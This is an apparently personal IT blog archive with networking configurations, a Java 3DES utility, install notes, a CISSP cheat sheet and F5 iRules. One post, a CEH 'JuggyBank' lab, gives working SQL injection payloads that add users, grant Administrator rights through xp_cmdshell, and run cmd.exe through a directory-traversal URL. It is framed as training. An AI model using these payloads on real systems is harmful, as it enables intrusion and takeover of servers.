Saturday, October 13, 2012

Cisco Catalyst 2960 Configuration To Support Avaya IP Phone


Configuration of Cisco 2960 Switch When Connected to Avaya IP Phone and PC
Data VLAN = 80
Voice VLAN = 2

Uplink port configuration for EtherChannel and trunking between the Cisco 2960 and the Avaya switch. Note that `spanning-tree bpdufilter enable` on the port-channel stops BPDU processing on this uplink, so a loop formed through the Avaya side would not be detected by spanning tree; the static `channel-group 1 mode on` bundling likewise gets no LACP misconfiguration protection.
interface Port-channel1
switchport trunk allowed vlan 2,80
switchport mode trunk
spanning-tree bpdufilter enable

interface GigabitEthernet1/0/23
switchport trunk allowed vlan 2,80
switchport mode trunk
no cdp enable
channel-group 1 mode on
!
interface GigabitEthernet1/0/24
switchport trunk allowed vlan 2,80
switchport mode trunk
no cdp enable
channel-group 1 mode on

Access port configuration for Avaya IP Phone port
interface GigabitEthernet1/0/33
switchport access vlan 80
switchport mode access
switchport voice vlan 2
speed 100
duplex full
mls qos trust cos
no cdp enable
spanning-tree portfast

Tuesday, March 27, 2012

3DES Data Encryption

The keystore type is: JCEKS
The padding mode is: PKCS5Padding

package com.FRNX.base.util;

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.Charset;
import java.security.GeneralSecurityException;
import java.security.InvalidKeyException;
import java.security.KeyStore;
import java.security.KeyStoreException;
import java.security.NoSuchAlgorithmException;
import java.security.Security;
import java.security.UnrecoverableEntryException;
import java.security.cert.CertificateException;
import java.util.ResourceBundle;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.SecretKey;

import com.FRNX.arch.exception.FRNXException;

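/**
 * 3DES (DESede) encryption helper backed by a JCEKS key store.
 *
 * Responsibilities:
 * 1. Loads the key store named by the "FRNX.keystore.location" entry of the
 *    "FRNXSecurity" resource bundle, or creates it when the file does not exist.
 * 2. Retrieves the symmetric key stored under {@code CIPHER_3DESKEY_ALIAS}, or
 *    generates and stores a fresh one when the key store is created.
 * 3. Encrypts text with "DESede/ECB/PKCS5Padding".
 *
 * Usage:
 * <pre>
 * String cipherText = FRNXSecurityUtil.encryptDataBy3DES(plainText);
 * </pre>
 *
 * The returned value is the ciphertext rendered as lower-case hexadecimal.  The
 * previous implementation returned {@code new String(cipherTextBytes)}, which
 * decodes arbitrary bytes with the platform charset and silently corrupts most
 * ciphertexts; hex keeps every byte recoverable.
 *
 * Review notes (kept as-is so callers do not break):
 * - The key store and key passwords are compiled into this class, so anyone
 *   holding the jar and the key store file can recover the key.
 * - ECB mode reveals when two plaintext blocks are equal, and DESede is a
 *   legacy algorithm; new designs should not copy this transformation.
 * - The key store is re-read on every call; there is no caching here.
 */
public class FRNXSecurityUtil
{
    private static final String keyStoreFilePath;
    private static final String CIPHER_ALGORITHM_3DES = "DESede";
    private static final String CIPHER_KEYSTORE_TYPE = "JCEKS";
    // Values as published (masked); see the class comment about hard-coded passwords.
    private static final String CIPHER_KEYSTORE_PASSWORD = "********";
    private static final String CIPHER_3DESKEY_PASSWORD = "********";
    private static final String CIPHER_3DESKEY_ALIAS = "3DESKey";
    private static final int CIPHER_3DESKEY_SIZE = 168;
    // ECB/legacy algorithm flagged in the class comment; unchanged to preserve output format.
    private static final String CIPHER_TRANSFORMATION = "DESede/ECB/PKCS5Padding";
    private static final int CIPHER_ENCRYPT_MODE = Cipher.ENCRYPT_MODE;
    // Fixed charset so the ciphertext does not depend on the JVM's default encoding.
    private static final Charset PLAIN_TEXT_CHARSET = Charset.forName("UTF-8");
    private static final char[] HEX_DIGITS = "0123456789abcdef".toCharArray();

    static
    {
        ResourceBundle resourceBundle = ResourceBundle.getBundle("FRNXSecurity");
        keyStoreFilePath = resourceBundle.getString("FRNX.keystore.location");
    }

    /**
     * Load the secret key from the key store file.
     * The key store file is configured in "FRNXSecurity.properties".
     * If the key store file exists, the secret key is read from it; otherwise the key
     * store file and a new secret key are generated and the key is stored in the file.
     *
     * @return the secret key generated or retrieved from the key store file.
     * @throws FRNXException wrapping any key store, algorithm, certificate or I/O failure,
     *         including a key store that has no secret key under the expected alias.
     */
    private static SecretKey loadSecretKeyFromKeyStore() throws FRNXException
    {
        File keyStoreFile = new File(keyStoreFilePath);
        try
        {
            char[] keyStorePassword = CIPHER_KEYSTORE_PASSWORD.toCharArray();
            KeyStore.PasswordProtection keyProtection =
                    new KeyStore.PasswordProtection(CIPHER_3DESKEY_PASSWORD.toCharArray());
            KeyStore keyStore = KeyStore.getInstance(CIPHER_KEYSTORE_TYPE);

            if (keyStoreFile.exists())
            {
                return readSecretKey(keyStore, keyStoreFile, keyStorePassword, keyProtection);
            }
            return createSecretKey(keyStore, keyStoreFile, keyStorePassword, keyProtection);
        }
        // GeneralSecurityException covers KeyStore, NoSuchAlgorithm, Certificate and
        // UnrecoverableEntry exceptions; IOException covers FileNotFoundException.
        catch (GeneralSecurityException e)
        {
            throw new FRNXException(e.getMessage(), e);
        }
        catch (IOException e)
        {
            throw new FRNXException(e.getMessage(), e);
        }
    }

    /**
     * Reads the DESede key stored under {@code CIPHER_3DESKEY_ALIAS} from an existing key store file.
     *
     * @param keyStore         an uninitialised key store instance of {@code CIPHER_KEYSTORE_TYPE}.
     * @param keyStoreFile     existing key store file to load.
     * @param keyStorePassword integrity password of the key store file.
     * @param keyProtection    password protecting the key entry.
     * @return the stored secret key.
     * @throws KeyStoreException if there is no secret key entry under the alias (the
     *         previous code would have failed with a NullPointerException here).
     * @throws GeneralSecurityException on any other key store or algorithm failure.
     * @throws IOException if the file cannot be read or closed.
     */
    private static SecretKey readSecretKey(KeyStore keyStore, File keyStoreFile,
            char[] keyStorePassword, KeyStore.PasswordProtection keyProtection)
            throws GeneralSecurityException, IOException
    {
        FileInputStream keyStoreFileInput = new FileInputStream(keyStoreFile);
        try
        {
            keyStore.load(keyStoreFileInput, keyStorePassword);
        }
        finally
        {
            keyStoreFileInput.close();
        }

        KeyStore.Entry entry = keyStore.getEntry(CIPHER_3DESKEY_ALIAS, keyProtection);
        if (!(entry instanceof KeyStore.SecretKeyEntry))
        {
            throw new KeyStoreException("No secret key entry found under alias '"
                    + CIPHER_3DESKEY_ALIAS + "' in " + keyStoreFile);
        }
        return ((KeyStore.SecretKeyEntry) entry).getSecretKey();
    }

    /**
     * Generates a fresh DESede key, writes it to a new key store file and returns it.
     *
     * @param keyStore         an uninitialised key store instance of {@code CIPHER_KEYSTORE_TYPE}.
     * @param keyStoreFile     file to create; missing parent directories are created.
     * @param keyStorePassword integrity password for the new key store file.
     * @param keyProtection    password protecting the key entry.
     * @return the generated secret key.
     * @throws GeneralSecurityException on key generation or key store failure.
     * @throws IOException if the directory or file cannot be created, written or closed.
     */
    private static SecretKey createSecretKey(KeyStore keyStore, File keyStoreFile,
            char[] keyStorePassword, KeyStore.PasswordProtection keyProtection)
            throws GeneralSecurityException, IOException
    {
        keyStore.load(null, null);
        KeyGenerator keyGenerator = KeyGenerator.getInstance(CIPHER_ALGORITHM_3DES);
        keyGenerator.init(CIPHER_3DESKEY_SIZE);
        SecretKey generatedKey = keyGenerator.generateKey();
        keyStore.setEntry(CIPHER_3DESKEY_ALIAS, new KeyStore.SecretKeyEntry(generatedKey), keyProtection);

        // getAbsoluteFile() so a bare file name (no parent) does not yield a null parent.
        File parentDir = keyStoreFile.getAbsoluteFile().getParentFile();
        if (parentDir != null && !parentDir.isDirectory() && !parentDir.mkdirs() && !parentDir.isDirectory())
        {
            throw new IOException("Could not create key store directory " + parentDir);
        }

        FileOutputStream keyStoreFileOutput = new FileOutputStream(keyStoreFile);
        try
        {
            keyStore.store(keyStoreFileOutput, keyStorePassword);
        }
        finally
        {
            keyStoreFileOutput.close();
        }
        return generatedKey;
    }

    /**
     * Encrypt the plain text with the 3DES algorithm ("DESede/ECB/PKCS5Padding").
     *
     * @param plainText the data to be encrypted; encoded as UTF-8 before encryption.
     * @return the ciphertext as lower-case hexadecimal, two characters per byte.
     * @throws NullPointerException if {@code plainText} is null.
     * @throws FRNXException if the key cannot be loaded or the cipher fails.
     */
    public static String encryptDataBy3DES(String plainText) throws FRNXException
    {
        if (plainText == null)
        {
            throw new NullPointerException("plainText");
        }
        // Loaded outside the try so an FRNXException from it is not re-wrapped.
        SecretKey desedeKey = loadSecretKeyFromKeyStore();
        try
        {
            Cipher cipher = Cipher.getInstance(CIPHER_TRANSFORMATION);
            cipher.init(CIPHER_ENCRYPT_MODE, desedeKey);
            byte[] cipherTextBytes = cipher.doFinal(plainText.getBytes(PLAIN_TEXT_CHARSET));
            return toHex(cipherTextBytes);
        }
        // Covers NoSuchPadding, NoSuchAlgorithm, InvalidKey, BadPadding and IllegalBlockSize.
        catch (GeneralSecurityException e)
        {
            throw new FRNXException(e.getMessage(), e);
        }
    }

    /**
     * Renders bytes as lower-case hexadecimal, two characters per byte.
     *
     * @param bytes the bytes to render; may be empty.
     * @return the hex string, empty for an empty input.
     */
    private static String toHex(byte[] bytes)
    {
        StringBuilder hex = new StringBuilder(bytes.length * 2);
        for (byte b : bytes)
        {
            hex.append(HEX_DIGITS[(b >> 4) & 0x0f]).append(HEX_DIGITS[b & 0x0f]);
        }
        return hex.toString();
    }
}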

Wednesday, December 21, 2011

Cisco Catalyst 4500 Supervisor LED Status Orange And In Continuous Boot Loop

The Cisco Catalyst 4500 switch is in a boot loop and restarts itself at random intervals (every 3 hours, 1 hour, 1 day). A check on the supervisor showed its LED status as orange.

FRNX4500-CORE#show environment status
Power Fan Inline
Supply Model No Type Status Sensor Status
------ ---------------- --------- ----------- ------- -------
PS1 PWR-C45-1000AC AC 1000W good good n.a.
PS2 PWR-C45-1000AC AC 1000W bad/off bad/off n.a.

Power supplies needed by system : 1
Power supplies currently available : 1

Chassis Type : WS-C4506

Power consumed by backplane : 0 Watts

Supervisor Led Color : Orange

Module 1 Status Led Color : Orange
Module 2 Status Led Color : Green
Module 3 Status Led Color : Green
Module 4 Status Led Color : Green
Module 5 Status Led Color : Green

Fantray : good

The diagnostic result shows the supervisor in a normal state:

FRNX4500-CORE#show diagnostic result module 1

module 1:

Overall diagnostic result: PASS

Test results: (. = Pass, F = Fail, U = Untested)

1) supervisor-bootup ---------------> .
2) packet-memory-bootup ------------> .
3) packet-memory-ongoing -----------> U

However, a check on the modules shows a power failure issue:

Chassis Type : WS-C4506

Power consumed by backplane : 0 Watts

Mod Ports Card Type Model Serial No.
---+-----+--------------------------------------+------------------+-----------
1 2 1000BaseX (GBIC) Supervisor(active) WS-X4013+ JAE********
2 6 1000BaseX (GBIC) WS-X4306-GB JAE********
3 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********
4 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********
5 32 10/100BaseTX (RJ45) WS-X4232-RJ-XX JAE********

M MAC addresses Hw Fw Sw Status
--+--------------------------------+---+------------+----------------+---------
1 ****.59e5.1a40 to 0017.59e5.1a41 4.1 12.2(20r)EW1 12.2(18)EW5 Ok
2 ****.9dd4.5276 to 0016.9dd4.527b 4.1 Ok
3 ****.9d1a.4220 to 0016.9d1a.424f 1.9 Ok
4 ****.d742.0260 to 000e.d742.028f 1.9 Ok
5 ****.946a.bf90 to 0017.946a.bfbf 1.9 Ok

System Failures:
----------------
Power Supply: bad/off (see 'show power')

Checked the Cisco database and confirmed that the amber light is caused by a bad PEM (power module).

As for the boot loop, show bootvar found that the boot flash is missing. This might be due to an improper reboot of the switch.

FRNX4500-CORE#show bootvar
BOOT variable does not exist
CONFIG_FILE variable does not exist
BOOTLDR variable does not exist
Configuration register is 0x2101

Assign boot image and change the config register from 0x2101 to 0x2102

FRNX4500-CORE#configure terminal
FRNX4500-CORE(config)#boot system flash bootflash:cat4000-i9s-mz.122-18.EW5.bin
FRNX4500-CORE(config)#config-register 0x2102

Thursday, November 17, 2011

ESIS Installation on SUSE

Check Version
FRNX:~ # cat /proc/version
Linux version 2.6.16.21-0.8-bigsmp (geeko@buildhost) (gcc version 4.1.0 (SUSE Linux)) #1 SMP Mon Jul 3 18:25:39 UTC 2006

Install Java (JRE) version 1.5.x
FRNX:/usr # md /usr/java
chmod a+x jre-1_5_0_22-linux-i586.bin
./jre-1_5_0_22-linux-i586.bin

Set JAVA_HOME Path
FRNX:~ # vi ~/.bashrc
JAVA_HOME=/usr/bin/java/jre1.5.0_22
export JAVA_HOME
PATH=$PATH:$JAVA_HOME/bin
export PATH

Enable/Verify Java
FRNX:~ # which java
/usr/bin/java/jre1.5.0_22/bin/java

FRNX:/usr/java # java -version
java version "1.5.0_22"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_22-b03)
Java HotSpot(TM) Server VM (build 1.5.0_22-b03, mixed mode)

Add ESIS Directory, Group and User
FRNX:/opt # mkdir /opt/ESIS
ESIS User & Group
FRNX:/opt # groupadd esisgp
FRNX:/opt # useradd -c 'ESIS user' -D esisgp -d /opt/ESIS esis
FRNX:/opt # chown -R esis:esisgp /opt/ESIS
FRNX:/opt # chmod 755 /opt/ESIS

Login as ESIS User
FRNX: su -l esis

Untar ESIS
esis@FRNX:~> tar xf ESIS_1_0_1-Linux-2.6.16.46-0.12-default-20100419-15h12.tar.gz

Define JAVA_HOME on ESIS
FRNX:~ # vi /opt/ESIS/bin/esis_env
JAVA_HOME=/usr/bin/java/jre1.5.0_22/bin/java; export JAVA_HOME

Install ESIS
esis@FRNX:~> /opt/ESIS/bin/esis_install
esis@FRNX:~> /opt/ESIS/bin/esis_startup
esis@FRNX:~> /opt/ESIS/bin/esis_integrate_lang /opt/ESIS/share/ESIS/lang

Company Creation
esis@FRNX:~> /opt/ESIS/bin/esis companies add FRNX FRNX
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

You are about to add a company :
Company name: FRNX
Short name: FRNX
Connection url: null
Connection username: null
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
A new company has been created : FRNX
in 0:0:2:337

Add Company Domain
esis@FRNX:~> /opt/ESIS/bin/esis companies add_domain_name FRNX frnx.com.my
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

You are about to add a domain name to a company :
Company name: FRNX
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
Domain gitn.com.my was added for company FRNX
in 0:0:2:670

Set Company As Default
esis@FRNX:~> /opt/ESIS/bin/esis prefs set com.entelience.esis.defaultCompany
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Please enter the value : >
FRNX
***** WARNING ******
YOU ARE ABOUT TO CHANGE AN APPLICATION PROPERTY
THIS COULD HAVE UNEXPECTED RESULTS LIKE
MAKING THE APPLICATION UNSTABLE OR UNUSABLE

PLEASE CONFIRM THAT YOU WANT TO PROCEED. y/n >y
Property [com.entelience.esis.defaultCompany] has been set to [FRNX]
in 0:0:9:474

Admin User Creation
esis@FRNX:~> /opt/ESIS/bin/esis users add adzril GITN
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Please enter new password : >
*********
Please enter new password again : >
*********
You are about to add a user :
User name: adzril
Company: FRNX
E-mail: null
First name: null
Last name: null
Phone: null
Location: null
***** WARNING ******
YOU ARE ABOUT TO CHANGE OR ADD A USER OR COMPANY
THIS COULD DISRUPT THE ACCESS TO THE APPLICATION FOR
CERTAIN USERS OR GRANT ACCESS TO ACCESS TO UNAUTHORIZED
PERSONS.

PLEASE CONFIRM THAT YOU WANT TO PROCEED : y/n >y
in 0:0:18:271

Modules Config
esis@FRNX:~> /opt/ESIS/bin/esis modules synchronize
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Synchronizing modules
Updating version
Synchronization successfull
in 0:0:0:387

List All Modules
esis@FRNX:~> /opt/ESIS/bin/esis modules list_all
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

All modules:
Class Name Full Name
-----------------------------------------+-----------------------------------------------
com.entelience.module.Admin | ESIS Administration
com.entelience.module.Assets | Assets Process Management
com.entelience.module.Audit | Risks Audit Management
com.entelience.module.IdentityManagement | Identities Process Management
com.entelience.module.Portal | Governance, Compliance and Risks consolidation
com.entelience.module.RiskAssessment | Risk Assessment Review
com.entelience.module.RiskModelisation | Risk Register
com.entelience.module.Vulnerabilities | Vulnerabilities Process Management
-----------------------------------------+-----------------------------------------------
in 0:0:0:396

Register Modules
esis@FRNX:~> /opt/ESIS/bin/esis modules register com.entelience.module.Admin
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Registering module com.entelience.module.Admin
Module com.entelience.module.Admin successfully registered
in 0:0:0:360
esis@FRNX:~> /opt/ESIS/bin/esis modules register com.entelience.module.Assets
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Registering module com.entelience.module.Assets
Module com.entelience.module.Assets successfully registered
in 0:0:0:341

Activate Modules
esis@FRNX:~> /opt/ESIS/bin/esis modules activate com.entelience.module.Assets
ESIS
Copyright (c) 2004-2008 Entelience, Copyright (c) 2008-2009 Equity SA, Copyright (c) 2009-2010 Consulare sarl

1.0.1-201004191508-0-rplb-branches_1_0_1

Activating module com.entelience.module.Assets
Enter the value for parameter : com.entelience.esis.feature.hideNewProduct
description :
default value : [false]
Press Return to use default value
>
Enter the value for parameter : com.entelience.esis.feature.hideNewVendor
description :
default value : [false]
Press Return to use default value
>
Module com.entelience.module.Assets successfully activated

Monday, February 07, 2011

Paessler PRTG - Monitoring WMI sensors (Error 80070005)

WMI monitoring often fails with the following error “Connection could not be established (80070005: Access Denied …)”

Basic Steps
- First of all, please check if the correct credentials are used, especially if the hostname is entered in the field “Domain or Computer Name” in PRTG. Please do not leave this field empty!
- Also verify if any firewalls in between PRTG and the target machine(s) may be interfering with connections on port 135.
- The next thing you should try is to configure the PRTG Probe service to run under a domain administrator account. Sometimes the access rights of the System Account under which the PRTG Probe runs by default are not sufficient. A dedicated account granted only the DCOM/WMI rights it needs is preferable to a full domain administrator, since the probe's credentials are used against every monitored host.

The next options depend on the Windows version running on the target machine.

Windows XP/2003
- Start the registry editor (regedit)
- Navigate to key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\
- Make sure that “ForceGuest” is set to “0”
- Reboot

Windows Vista/2008 (R2)
- Open the control panel, head to the Windows firewall
- Click on “Change Settings” and then please select the “Exceptions” tab
- Select the check box for “Windows Management Instrumentation (WMI)”
- Open a command prompt (as administrator) and enter the following line to set another firewall group rule
- netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
- Reboot

Windows 7
- Open Windows Firewall
- Click on “Advanced Settings” and then, for both Inbound and Outbound Rules
- Select all checkboxes for “Windows Management Instrumentation”
- Open a command prompt (as administrator) and enter the following line to set another firewall group rule
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
- Reboot

Thursday, October 21, 2010

CISSP Cheat Sheet

Common Criteria
EAL measures how the needs are met
Protection Profiles – describe objectives, and the environmental, functional, and assurance level expectations
Target of Evaluation (TOE) – Product proposed to provide the needed security solution
Security Target – Written by vendor explaining mechanisms that meet security and assurance requirements
Evaluated Products List EPL- list of evaluated products

EAL 1 Functionally tested
EAL 2 Structurally tested
EAL 3 Methodically tested and checked
EAL 4 Methodically designed, tested, and reviewed
EAL 5 Semiformally designed and tested
EAL 6 Semiformally verified design and tested
EAL 7 Formally verified design and tested

(FSMSF - T/TC/TD/TDV :Test/Test-Check/Test-Design/Test-Design-Verified)

EAL measures how the needs are met
Protection Profiles – describe objectives, and the environmental, functional, and assurance level expectations
Target of Evaluation (TOE) – Product proposed to provide the needed security solution
Security Target – Written by vendor explaining mechanisms that meet security and assurance requirements
Evaluated Products List (EPL)- list of evaluated products

Risk Analysis
ALE = ARO x SLE
SLE = AV x EF

Bell-LaPadula (MAC)
NO WRITE DOWN
NO READ UP
USER<=File to write
Biba (Integrity)
NO WRITE UP
NO READ DOWN
USER =>File to Write

Symmetric Encryption
Notation: w/r/b (data/round/key size)
DES: 64(56+8) / 16 / 64(56+8)
3DES : 64(56+8) / 48 / 64(56+8)
AES : 128,192,256 / 10,12,14 / 128,192,256
IDEA : 64 / 8 / 128
Blowfish : 64 /16 / 32-448
RC5 : 32,64,128 / 255 / 0-2048

Asymmetric Encryption
Diffie-Hellman
- vulnerable to man-in-the-middle attack
- discrete logarithm in a finite field
- no auth
RSA
- factoring product of 2 prime number
- encryption + digital signature
- one way function
El-Gamal
- digital signature + encryption + key exchange
- discrete logarithm in a finite field
- performance : the slowest
Elliptic Curve Crypto (ECC)
- digital signature + encryption + secure key distribution
- more efficient than RSA
- discrete logarithm on an elliptic curve
Knapsack
- based on the knapsack problem; insecure, not in use

TCSEC
D - Minimal Protection
C1 - Discretionary Security Protection (DAC)
C2 - Controlled Access Protection (login process)
B1 - Labeled Protection (Labels and MAC)
B2 - Structured Protection (Covert channel storage analysis, Security model defined & documented)
B3 - Security Domains (Reference monitor, Automated intrusion detection & response, covert timing channels)
A1 - Verified Design

Sunday, June 20, 2010

NIC Teaming LinkedTo Stacked Switch

Multiple switches, when connected using the stack cable, form one logical device. This gives you two separate switches that you can configure with the same channel group, and if one switch fails, you still have the other.

Configuring Manual Aggregation Group
A manual aggregation group is manually created. All its member ports are manually added and can be manually removed (it inhibits the system from automatically adding/removing ports to/from it). Each manual aggregation group must contain at least one port. When a manual aggregation group contains only one port, you cannot remove the port unless you remove the whole aggregation group.

LACP is disabled on the member ports of manual aggregation groups, and enabling LACP on such a port will not take effect.

system-view
System View: return to User View with Ctrl+Z.
[furynax] link-aggregation group 1 mode manual
[furynax] link-aggregation group 1 description Link Aggregation for Server Teaming
[furynax] interface GigabitEthernet1/0/1
[furynax-GigabitEthernet1/0/1] port link-aggregation group 1
[furynax-GigabitEthernet1/0/1] interface GigabitEthernet2/0/1
[furynax-GigabitEthernet2/0/1] port link-aggregation group 1


Display and Maintain Link Aggregation Configuration

[furynax] display link-aggregation summary

Friday, March 19, 2010

JuggyBank SQL Injection Mini Lab Demo

This lab depends on the "juggybank" website that comes with the CEH courseware, with SQL Server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will also. If the database is something other than SQL Server, then only the syntax of the SQL statements will change, but the basis for the attack is actually in the weak ASP scripts used for the juggybank login.

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or address bar. If an page is returned that access is denied or CGI error" then you are in business.

Paste this at username field. It will create new user 'furynax' with password 'loop' at the app level.
';insert into userinfo values('furynax','loop')--


Paste this at the address bar to create user furynax at OS level with normal user privilege
';exec master..xp_cmdshell 'net user /add furynax loop';--


Use this command at browser address bar to assign user furynax with Administrator privilege
';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--


Paste this command at address bar to Explore C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS command.The only real limits are your skill and imagination using it
http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


IxChariot High Performance Throughput Script

IxChariot is a test tool for simulating applications and assessing network performance. This script emulates sending a file from Endpoint 1 to Endpoint 2, and getting a confirmation back. The default file size is 100,000 bytes.
Endpoint 1 Endpoint 2
---------- ----------
SLEEP
initial_delay=0
CONNECT_INITIATE CONNECT_ACCEPT
source_port=AUTO destination_port=AUTO
0 0
0 0
LOOP LOOP
number_of_timing_records=100 number_of_timing_records=100
START_TIMER
LOOP LOOP
transactions_per_record=1 transactions_per_record=1
SEND RECEIVE
file_size=10000000 file_size=10000000
send_buffer_size=65535 receive_buffer_size=65535
send_datatype=NOCOMPRESS
send_data_rate=UNLIMITED
CONFIRM_REQUEST CONFIRM_ACKNOWLEDGE
INCREMENT_TRANSACTION
END_LOOP END_LOOP
END_TIMER
SLEEP
transaction_delay=0
END_LOOP END_LOOP
DISCONNECT DISCONNECT
close_type=Reset close_type=Reset

JSessionID-Based Persistence

Universal Persistence
BIG-IP LTM software includes the Universal Inspection Engine (UIE). The UIE is a set of functions that allows you to direct and persist load-balanced traffic using iRules. Universal persistence uses the UIE which allows you to use persistence for sessions based on content data, or based on connections to a specific pool member, by defining a sequence of bytes in the connection to use as a session identifier.

iRule Example
The following iRule example illustrates how the LTM can find a cookie called FURYNAX in the first response from the server and add a persistence record for that cookie. Subsequent client requests containing the same cookie will persist to the same pool member.

# Universal (UIE) persistence keyed on the application session cookie "FURYNAX".
# The first server response carrying the cookie creates the persistence record;
# later requests are steered by the cookie, or by the same token found in the URI
# when the cookie is absent.
when CLIENT_ACCEPTED {
# Per-connection flag: only the first cookie-bearing response adds a record.
set add_persist 1
}
when HTTP_RESPONSE {
if { [HTTP::cookie exists "FURYNAX"] and $add_persist } {
# Bind this cookie value to the pool member that produced the response.
persist add uie [HTTP::cookie "FURYNAX"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "FURYNAX"] } {
persist uie [HTTP::cookie "FURYNAX"]
} else {
# findstr: locate the name in the URI, skip 13 characters, read up to ";".
# NOTE(review): the skip count is normally the cookie name length plus one for
# the "=" sign; 13 does not match the 7-character name FURYNAX, so this looks
# like a leftover from a longer original name -- confirm against the real cookie.
set jsess [findstr [HTTP::uri] "FURYNAX" 13 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Other iRule examples

# Universal (UIE) persistence keyed on the "CSPSESSIONID-SP-57772-UP-csp-sys-" cookie.
# Same pattern as the FURYNAX example: the first server response carrying the
# cookie creates the record; requests are steered by the cookie or by the token
# found in the URI when the cookie is absent.
when CLIENT_ACCEPTED {
# Per-connection flag: only the first cookie-bearing response adds a record.
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] and $add_persist } {
# Bind this cookie value to the pool member that produced the response.
persist add uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "CSPSESSIONID-SP-57772-UP-csp-sys-"] } {
persist uie [HTTP::cookie "CSPSESSIONID-SP-57772-UP-csp-sys-"]
} else {
# Skip 34 = the 33-character cookie name plus one for the "=" sign, then read up to ";".
set jsess [findstr [HTTP::uri] "CSPSESSIONID-SP-57772-UP-csp-sys-" 34 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

# Universal (UIE) persistence keyed on the Java servlet "JSESSIONID" cookie.
# The first server response carrying the cookie creates the record; requests are
# steered by the cookie, or by the ";JSESSIONID=..." token in the URI when the
# cookie is absent (URL-rewritten sessions).
when CLIENT_ACCEPTED {
# Per-connection flag: only the first cookie-bearing response adds a record.
set add_persist 1
}

when HTTP_RESPONSE {
if { [HTTP::cookie exists "JSESSIONID"] and $add_persist } {
# Bind this cookie value to the pool member that produced the response.
persist add uie [HTTP::cookie "JSESSIONID"]
set add_persist 0
}
}

when HTTP_REQUEST {
if { [HTTP::cookie exists "JSESSIONID"] } {
persist uie [HTTP::cookie "JSESSIONID"]
} else {
# Skip 11 = the 10-character cookie name plus one for the "=" sign, then read up to ";".
set jsess [findstr [HTTP::uri] "JSESSIONID" 11 ";"]
if { $jsess != "" } {
persist uie $jsess
}
}
}

Validate Persistence Records

[root@ltm1:Active] config # b persist show all
PERSISTENT CONNECTIONS --
Mode: universal Value: nVTLLvHDy9GQJQ4T29LPwsLqXXCB2pTGJ3KR49WhpvvBwZyPrxQT!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 231sec

Mode: source addr Value: 10.21.33.39
Virtual: 10.251.3.145:https Node: 10.251.44.5:any Age: 12sec

Mode: universal Value: Cn18LvHQR8dyZH1S1BmnSxVGcDMvHz12JlTFnJFryvKZpgrrTBdZ!-167612729!-671022569
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 288sec

Mode: universal Value: G4JbLvHXFg2LrXnz71hyJWBGLgT7fQXJbw4G5nhvFThh2pDfymLY!-671022569!-167612729
Virtual: 10.251.3.144:https Node: 10.251.44.2:any Age: 188sec